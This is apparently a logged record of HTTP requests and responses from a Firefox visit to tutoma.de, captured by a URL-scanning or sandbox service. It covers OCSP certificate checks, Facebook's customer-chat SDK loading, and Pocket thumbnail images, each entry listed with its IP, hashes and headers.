93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash b6e7c5faf2d24e0d958ab10ee95f6791
16b68ad4b4a2776571697dff8edc9369a3c5c451
1431771f6fd4ad8c028d53a7489acc16b829e32e01d92df5e8c923723024b75a
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4784
Cache-Control: max-age=148920
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Etag: "637e2d20-1d7"
Expires: Fri, 25 Nov 2022 15:44:16 GMT
Last-Modified: Wed, 23 Nov 2022 14:24:32 GMT
Server: ECS (ska/F718)
X-Cache: HIT
Content-Length: 471
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash b6e7c5faf2d24e0d958ab10ee95f6791
16b68ad4b4a2776571697dff8edc9369a3c5c451
1431771f6fd4ad8c028d53a7489acc16b829e32e01d92df5e8c923723024b75a
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4784
Cache-Control: max-age=148920
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:16 GMT
Etag: "637e2d20-1d7"
Expires: Fri, 25 Nov 2022 15:44:16 GMT
Last-Modified: Wed, 23 Nov 2022 14:24:32 GMT
Server: ECS (ska/F718)
X-Cache: HIT
Content-Length: 471
connect.facebook.net/de_DE/sdk/xfbml.customerchat.js
157.240.200.14 200 OK 92 kB URL HTTP/2 connect.facebook.net/de_DE/sdk/xfbml.customerchat.js
IP 157.240.200.14:0
File type ASCII text, with very long lines (20829)
Hash d096a5403bb19462ee5ad86aed517deb
d8cec606ba02e2e179c8ae86506864f7dbf35870
2c4aab3ba721b4e4d21ce062b64eb1bce4749c6268984ecb8ea75673cbb32031
GET /de_DE/sdk/xfbml.customerchat.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
access-control-expose-headers: X-FB-Content-MD5
x-fb-content-md5: 18956d9025f0fda1fe565af9b50f7993
etag: "e5c6db35fea06e44a79e39ba073733c2"
content-type: application/x-javascript; charset=utf-8
timing-allow-origin: *
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
expires: Wed, 23 Nov 2022 22:32:33 GMT
cache-control: public,max-age=1200,stale-while-revalidate=3600
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
x-fb-rlafr: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-md5: 0JalQDuxlGLuWthq7VF96w==
x-fb-debug: 0LRah8OjaV6TdSKz+/BknBQcuPpk3aiHVcA0FFTkRYISJ7wje09vSbASuEb/Im9PwRaN6gewl8jPxnnZhM5p1A==
content-length: 92460
x-fb-trip-id: 1679558926
date: Wed, 23 Nov 2022 22:22:16 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
www.facebook.com/plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_create&is_loaded_by_facade=true&loading_time=0&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
157.240.200.35 200 OK 0 B URL HTTP/2 www.facebook.com/plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_create&is_loaded_by_facade=true&loading_time=0&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
IP 157.240.200.35:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_create&is_loaded_by_facade=true&loading_time=0&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136533&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: https://tutoma.de
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: HdgdjW4FBJSuGeSbpYN7YjAMuNvy7M+RSql9+zL0A/XRzg5biHFxLYWUYDZiANzHKsjK+uaXBIu+UyXtAu6bLg==
content-length: 0
date: Wed, 23 Nov 2022 22:22:16 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
www.facebook.com/plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_load&is_loaded_by_facade=true&loading_time=176&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136709&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
157.240.200.35 200 OK 0 B URL HTTP/2 www.facebook.com/plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_load&is_loaded_by_facade=true&loading_time=176&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136709&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29
IP 157.240.200.35:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /plugins/customer_chat/SDK/?app_id=&attribution=setup_tool&channel=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df1543edd964108%26domain%3Dtutoma.de%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Ftutoma.de%252Ff18c46fe8cdc3fc%26relation%3Dparent.parent&current_url=https%3A%2F%2Ftutoma.de%2F&event_name=chat_plugin_sdk_facade_load&is_loaded_by_facade=true&loading_time=176&locale=de_DE&log_id=8a83b7b8-33b0-4562-9cbd-9001f78d3e9f&logged_in_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&logged_out_greeting=Hi!%20was%20kann%20ich%20f%C3%BCr%20sie%20tun&page_id=2141796126149219&request_time=1669242136709&sdk=joey&should_use_new_domain=false&suppress_http_code=1&theme_color=%23ff7e29 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Origin: https://tutoma.de
Connection: keep-alive
Referer: https://tutoma.de/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
x-fb-rlafr: 0
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self' connect.facebook.net;style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: https://tutoma.de
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: ff7/IDsXlPrz+2We11HCIYYjgj3PcexeCk4+7Kbdd4uSeJK+aV5bbq3lfP0soTTNn8sLjrwEYKGi+tcNGowQJA==
content-length: 0
date: Wed, 23 Nov 2022 22:22:16 GMT
priority: u=3,i
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.249 200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.249 200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.249 200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.249 200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.76.249 200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 611d1eca860866489908506a26bd6a2a
5e8c401f098357cd12889a6e507baf7c8a87772a
e3216e5edd547bc8f6a43780da5a118842b96de96d5cf668af68d8706ceb32e4
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "E3216E5EDD547BC8F6A43780DA5A118842B96DE96D5CF668AF68D8706CEB32E4"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13099
Expires: Thu, 24 Nov 2022 02:00:36 GMT
Date: Wed, 23 Nov 2022 22:22:17 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F20f7461d-18d1-4343-9ecb-d68d44ce1ee4.jpeg
34.120.237.76 200 OK 7.6 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F20f7461d-18d1-4343-9ecb-d68d44ce1ee4.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 06c6e720bc9900b38e88cd72f739603e
22884cbc78622d6f78c1c3397c9b440946144a99
8675d08e6d8ae5bdedbc7c7ce647f8c6e72cc457917b4ed1856c50b11c2fe88b
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F20f7461d-18d1-4343-9ecb-d68d44ce1ee4.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7589
x-amzn-requestid: 533d7650-cb21-4090-a50a-e205adad316d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: brr5zH4qoAMF79Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63748d0b-017f7bf4390eb124097af648;Sampled=0
x-amzn-remapped-date: Wed, 16 Nov 2022 07:11:07 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: nwXP5jm9A2Cl3_-Lm194ycXkeClig1L9hwgUgE8i8NF-Vv2gNfj_4Q==
via: 1.1 95b0ac620fa3a80ee590ecf1cda1c698.cloudfront.net (CloudFront), 1.1 9c675215120a4ade8754c4357ef2f3ea.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 15:14:08 GMT
age: 25689
etag: "22884cbc78622d6f78c1c3397c9b440946144a99"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F559c6770-d162-460d-b372-5ff036a364d6.jpeg
34.120.237.76 200 OK 12 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F559c6770-d162-460d-b372-5ff036a364d6.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 9defa28d124bae7e5ef29a1fb165ee02
2afe813f0fefae511064297ccff9a6de548104e8
8cfdd12386dcc87cfd874ed0c2d42cd33ae2a05cb35127f1a94e163d17bd5b31
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F559c6770-d162-460d-b372-5ff036a364d6.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11576
x-amzn-requestid: 9dd2cb2e-de79-4937-b525-05be9d57c03b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: b-IrdFuxoAMFa9g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637bee49-5437ea0f1568967278fe96ad;Sampled=0
x-amzn-remapped-date: Mon, 21 Nov 2022 21:31:53 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: MtH0aETjrojNhxcpN67UwvtC7rWC2A1ACxmD-u-LEd0WB43qBNPu6g==
via: 1.1 b4085435efbe95a420f374958bd145be.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 22:08:18 GMT
age: 839
etag: "2afe813f0fefae511064297ccff9a6de548104e8"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
